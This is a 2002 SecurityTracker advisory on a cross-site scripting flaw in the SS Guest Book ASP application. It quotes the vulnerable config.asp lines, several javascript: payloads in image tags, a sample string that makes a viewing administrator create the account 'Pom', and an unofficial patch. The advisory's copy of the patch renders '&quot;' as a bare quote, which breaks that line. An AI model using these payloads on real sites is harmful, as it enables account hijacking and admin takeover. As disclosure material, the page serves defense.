SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   SS Guest Book Vendors:   Bankert, Terry
SS Guest Book Input Validation Flaw in Image Tags Allows Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005386
SecurityTracker URL:  http://securitytracker.com/id/1005386
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 8 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1
Description:   An input validation vulnerability was reported in the SS Guest Book from 'Script-Shed.com'. A remote user can conduct cross-site scripting attacks to gain access to the guest book application.

It is reported that config.asp does not filter user-supplied HTML tags from '[img]' image tags. A remote user can submit a guest book comment that contains HTML. Then, when a target user views the guest book entry, arbitrary scripting code will be executed by the target user's browser. The code will originate from the site running SS Guest Book and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit example is provided:

[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

If a target user with administrative privileges views a message containing the above listed exploit string, the specified user account (Pom) will be created with the specified password (turlututu).

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running SS Guest Book, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. If the target user is an administrator, the remote user can cause the target user to add a specified account to the system with a specified password.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following unofficial patch:

In config.asp :
Add this line :

strOutput = Replace(strOutput, chr(34), """)

after

----------------------------------------------
strOutput = Replace(strOutput, "<", "&lt;")
strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------

And replace this lines :


------------------------------------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""","""
border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img
align=right src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left
src=""",""" id=left border=0>")
------------------------------------------------


by :

------------------------------------------------
fString = doCode(fString, "[img]http://","[/img]","<img src=""http://","""
border=0>")
fString = doCode(fString, "[image]http://","[/image]","<img
src=""http://",""" border=0>")
fString = doCode(fString, "[img=right]http://","[/img=right]","<img
align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[image=right]http://","[/image=right]","<img
align=right src=""http://",""" id=right border=0>")
fString = doCode(fString, "[img=left]http://","[/img=left]","<img
align=left src=""http://",""" id=left border=0>")
fString = doCode(fString, "[image=left]http://","[/image=left]","<img
align=left src=""http://",""" id=left border=0>")
------------------------------------------------

Vendor URL:  www.script-shed.com/ssgbook/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SSGbook (ASP)


Informations :
Product : SSGbook
Langage : ASP
Tested version : 1
Website : http://www.script-shed.com
Problem : Cross Site Scripting

PHP Code / location :
----------------- config.asp ----------------------
fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>")
fString = doCode(fString, "[img=right]","[/img=right]","<img align=right 
src=""",""" id=right border=0>")
fString = doCode(fString, "[image=right]","[/image=right]","<img align=right 
src=""",""" id=right border=0>")
fString = doCode(fString, "[img=left]","[/img=left]","<img align=left 
src=""",""" id=left border=0>")
fString = doCode(fString, "[image=left]","[/image=left]","<img align=left 
src=""",""" id=left border=0>")
----------------- config.asp ----------------------

Exploit :
[image]javascript:{SCRIPT}[/image]
[img=right]javascript:{SCRIPT}[/img=right]
[image=right]javascript:{SCRIPT}[/image=right]
[img=left]javascript:{SCRIPT}[/img=left]
[image=left]javascript:{SCRIPT}[/image=left]
[img]javascript:{SCRIPT}[/img]


e.g. :
[image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

Add an admin if an admin read it. Login : Pom, Password : turlututu

Patch :
In config.asp :
Add this line :

  strOutput = Replace(strOutput, chr(34), "&quot;")

after

----------------------------------------------
  strOutput = Replace(strOutput, "<", "&lt;")
  strOutput = Replace(strOutput, ">", "&gt;")
----------------------------------------------

And replace this lines :


------------------------------------------------
	fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>")
	fString = doCode(fString, "[image]","[/image]","<img src=""",""" 
border=0>")
	fString = doCode(fString, "[img=right]","[/img=right]","<img align=right 
src=""",""" id=right border=0>")
	fString = doCode(fString, "[image=right]","[/image=right]","<img 
align=right src=""",""" id=right border=0>")
	fString = doCode(fString, "[img=left]","[/img=left]","<img align=left 
src=""",""" id=left border=0>")
	fString = doCode(fString, "[image=left]","[/image=left]","<img align=left 
src=""",""" id=left border=0>")
------------------------------------------------


by :

------------------------------------------------
	fString = doCode(fString, "[img]http://","[/img]","<img src=""http://",""" 
border=0>")
	fString = doCode(fString, "[image]http://","[/image]","<img 
src=""http://",""" border=0>")
	fString = doCode(fString, "[img=right]http://","[/img=right]","<img 
align=right src=""http://",""" id=right border=0>")
	fString = doCode(fString, "[image=right]http://","[/image=right]","<img 
align=right src=""http://",""" id=right border=0>")
	fString = doCode(fString, "[img=left]http://","[/img=left]","<img 
align=left src=""http://",""" id=left border=0>")
	fString = doCode(fString, "[image=left]http://","[/image=left]","<img 
align=left src=""http://",""" id=left border=0>")
------------------------------------------------




More details in french :
http://www.frog-man.org/tutos/SSGbook.txt

translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n


_________________________________________________________________
Discutez en ligne avec vos amis ! http://messenger.msn.fr

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC